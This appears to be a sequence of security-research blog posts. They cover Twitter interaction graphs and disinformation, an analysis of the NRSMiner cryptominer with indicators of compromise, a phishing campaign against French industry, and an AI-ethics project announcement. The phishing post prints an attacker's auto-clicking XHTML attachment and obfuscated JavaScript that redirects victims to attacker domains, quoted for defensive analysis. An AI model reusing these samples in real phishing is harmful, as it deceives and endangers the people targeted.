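    ("user_c", "user_b"),  # user_c mentions user_b
    ("user_b", "user_a"),  # user_b replies to user_a
]
edges, mentions = build_graph(interactions)
print(mentions.most_common(1))  # [('user_b', 2)]
```

A library such as networkx, combined with community detection and a force-directed layout, turns an edge list like this into visualizations of the kind shown here.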

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, in which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a user is suicidal, or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up by the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

It’s not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.



NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.

nrsminer_countrystatistics

November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.

 

How NRSMiner spreads

There are two methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or:
  • If the system is unpatched (MS17-010) and another system within the intranet has been infected by NRSMiner.

 

Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:

nrsminer_ipaddresses

List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.

WUDHostUpgrade[xx].exe

The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine if the system has already been infected with the latest NRSMiner version. If the system is infected, the WUDHostUpgrade[xx].exe deletes itself. Otherwise, it deletes the files MarsTraceDiagnostics.xml, snmpstorsrv.dll, and MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml, snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.
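This timestamp-copying step ("timestomping") makes the dropped files blend in with legitimate system files. A rough Python illustration of the technique follows; note that os.utime can only set access and modification times, and changing the CreationTime property additionally requires the Windows SetFileTime API. The file names are placeholders, not the malware's code.

```python
import os
import tempfile

# Copy a reference file's access/modification timestamps onto a target file,
# as the malware does with svchost.exe's timestamps.
def copy_times(reference, target):
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

# Illustrative usage with two temporary files standing in for
# svchost.exe and a dropped component:
with tempfile.TemporaryDirectory() as tmp:
    ref = os.path.join(tmp, "reference.bin")
    tgt = os.path.join(tmp, "target.bin")
    for path in (ref, tgt):
        with open(path, "wb") as f:
            f.write(b"data")
    copy_times(ref, tgt)
    match = os.stat(ref).st_mtime_ns == os.stat(tgt).st_mtime_ns
print(match)  # True
```

For defenders, a modification time that exactly matches svchost.exe is itself a useful anomaly to hunt for.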

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.

 

nrsminer_WUDHostUpgradexx_code

Pseudo-code for WUDHostUpgradexx.exe’s actions

 

Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.

nrsminer_Snmpstorsrv_activities

Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.

nrsminer_urls

Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware will delete all components of its older version before infecting it with the newer one. To remove the prior version of itself, the newest version refers to a list of services, tasks and files to be deleted that can be found as strings in the snmpstorsrv.dll file; to remove all older versions, it refers to a list that is found in the MarsTraceDiagnostics.xml file.

nrsminer_delete_list

List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.

nrsminer_decompressed_miner

The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information


System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which performs the same activities as described in the “Updater Module” section above. This updater module can be used to infect systems with any upcoming version of NRSMiner.

 

Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips the files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes two new files named x86.dll and x64.dll into the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.
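From a defender's perspective, the same reachability check is easy to reproduce. The sketch below is our own illustration (not the malware's code): it attempts a short-timeout TCP connection to port 445 on each candidate host; the hosts shown are unreachable TEST-NET placeholder addresses.

```python
import socket

# Check whether a host accepts TCP connections on a given port (445 = SMB).
def port_open(host, port=445, timeout=0.5):
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# TEST-NET addresses (RFC 5737), never reachable -> both print False.
for host in ("192.0.2.1", "192.0.2.2"):
    print(host, port_open(host))
```

Running such a sweep over your own subnets is a quick way to inventory hosts exposing SMB, which is exactly the surface this malware propagates across.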

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.

nrsminer_propagation_method

Propagation method

x86.dll/x64.dll

This file creates a socket connection and gets the MarsTraceDiagnostics.xml file in %systemroot%\system32 folder from the parent infected system. It extracts the snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, so that it repeats the whole infection cycle and finds other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:

nrsminer_miner_parameters

Miner parameters

The following are the switches used in the parameters:

  • -o, --url=URL          URL of mining server
  • -u, --user=USERNAME    username for mining server
  • -p, --pass=PASSWORD    password for mining server
  • -t, --threads=N        number of miner threads
  • --donate-level=N       donate level, default 5% (5 minutes in 100 minutes)
  • --nicehash             enable nicehash.com support

 

Detection

F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and that the F-Secure Security Cloud connection is enabled.
    • Ensure that the F-Secure firewall is turned on with its default settings. Alternatively, configure your firewall to properly block inbound and outbound traffic on port 445 within the organization to prevent the infection from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch it immediately, we recommend that you disable SMBv1 with the steps documented in Microsoft Knowledge Base Article 2696547 to reduce attack surface.

 

Indicators of compromise (IOCs):

SHA1s:

32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 - tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda - tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 - x64.dll
641603020238a059739ab4cd50199b76b70304e1 - x86.dll
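As a defensive aid, the SHA1 indicators above can be swept against files on disk. The sketch below is our own illustration; only the two example hashes come from the list, the scanning logic is generic.

```python
import hashlib

# Two of the published NRSMiner SHA1 indicators (see the list above).
IOC_SHA1S = {
    "32ffc268b7db4e43d661c8b8e14005b3d9abd306",  # MarsTraceDiagnostics.xml
    "07fab65174a54df87c4bc6090594d17be6609a5e",  # snmpstorsrv.dll
}

def sha1_of_file(path, chunk_size=1 << 20):
    """Stream a file through SHA1 so large binaries aren't loaded into memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def is_ioc(path):
    """True if the file's SHA1 matches a published indicator."""
    return sha1_of_file(path) in IOC_SHA1S
```

Pointing is_ioc at %systemroot%\system32 and %systemroot%\AppDiagnostics would cover the drop locations described in this analysis.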

IP addresses:

167[.]179.79.234
104[.]248.72.247
172[.]105.229.220
207[.]148.110.212
149[.]28.133.197
167[.]99.172.78
181[.]215.176.23
38[.]132.111.23
216[.]250.99.33
103[.]103.128.151

URLs:

c[.]lombriz[.]tk
state[.]codidled[.]com
null[.]exhauest[.]com
take[.]exhauest[.]com
junk[.]soquare[.]com
loop[.]sawmilliner[.]com
fox[.]weilders[.]com
asthma[.]weilders[.]com
reader[.]pamphler[.]com
jump[.]taucepan[.]com
pluck[.]moisture[.]tk
handle[.]pamphler[.]com


Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting French industry. Among the targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Since the beginning of October 2018, we have seen multiple phishing emails that follow a similar pattern and use similar indicators and obfuscation, with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the attachment’s name. The attachments can be HTML or PDF files, usually named “document“, “preuves“, or “fact“, optionally followed by an underscore and six digits. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s the content of an example XHTML attachment from the 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>

 

Evolution of the campaign

The first phishing emails, observed at the beginning of October, contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October, these payload addresses were further obfuscated by putting them behind redirects. The author developed a simple piece of JavaScript to obfuscate a set of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This JavaScript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.
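The obfuscation itself is thin: every string in the script is stored as hex escape sequences, and at runtime the script simply picks a random decoded domain and calls window.location.replace("http://" + domain). The escapes decode with one call outside the browser, for example in Python:

```python
import codecs

# First entry of the obfuscated array in the script above.
first_domain = codecs.decode(
    r"\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
    "unicode_escape",
)
# One of the trailing helper strings (the URL scheme prepended to the domain).
scheme = codecs.decode(r"\x68\x74\x74\x70\x3A\x2F\x2F", "unicode_escape")

print(first_domain)  # uqvk8ftuw5it8dsglcz.pw
print(scheme)        # http://
```

Decoding the remaining helper strings the same way yields "random", "length", "floor", "replace", and "location", confirming the random-redirect behavior.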

However, it appears that the use of JavaScript code inside attachments was not a huge success: only days later, the domain-deobfuscation and redirection code was moved behind pste.eu, a Pastebin-like service for HTML code. The phishing emails thereafter contained links to pste.eu, such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution, during November, we observed a few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

A few days later, on the 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter-shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents in their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns, products, lotteries, and the like.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to a 302 redirection chain. The delivery method remains XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly, with the attackers actively generating new domains and new methods of redirection and obfuscation. At the time of writing, the payload URLs lead to an advertising redirection chain involving multiple domains and URLs known for malvertising.

 

Infrastructure

The campaign has mostly been observed using compromised Wanadoo email accounts, and later email accounts on the attackers' own domains, such as rault@3130392E3130322E37322E3734.lho33cefy1g.pw, to send out the emails. The subdomain is the name of the sending email server and is a hex-encoded representation of the server's public IP address, in this case 109.102.72.74.
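The hex label is simply the ASCII bytes of the dotted-quad address, so decoding it is a one-liner (using the subdomain from the sample address above):

```python
def hex_subdomain_to_ip(hex_label):
    # "3130392E3130322E37322E3734" is the ASCII hex encoding of the
    # sending server's public IP address
    return bytes.fromhex(hex_label).decode("ascii")

print(hex_subdomain_to_ip("3130392E3130322E37322E3734"))  # -> 109.102.72.74
```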

The server behind the .pw domain appears to be a Postfix email server already listed on multiple blacklists. The compromised email accounts used for sending the phishing emails always come from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or the .pw payload domains) later in November, we were redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers as many similar-looking domains. Closer investigation of these servers revealed that they are known for hosting PUP/adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact on VirusTotal, submitted from France. The file is a .zip archive that contained the following:

  • “All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool, containing the checker results. Both .vbs files are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails on the 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to upload this tool, zipped together with the results, to VirusTotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.

2bv9npptni4u46knazx2.pw
p95jadah5you6bf1dpgm.pw
lho33cefy1g.pw
mail-server-zpqn8wcphgj.pw
http://piecejointe.pro/facture/redirect.php
http://email-document-joint.pro/redir/
l45yvbz21a.website
95plb963jjhjxd.space
sjvmrvovndqo2u.icu
jeu0rgf5apd5337.site
95.222.24.44 - Email Server
109.102.72.74 - Email Server
83.143.150.210 - Email Server
37.60.177.228 - Web Server / Malware C2
87.236.22.87 - Web Server / Malware C2
207.180.233.109 - Web Server
91.109.5.170 - Web Server
162.255.119.96 - Web Server
185.86.78.238 - Web Server
176.119.157.62 - Web Server
113.181.61.226

The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co


Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

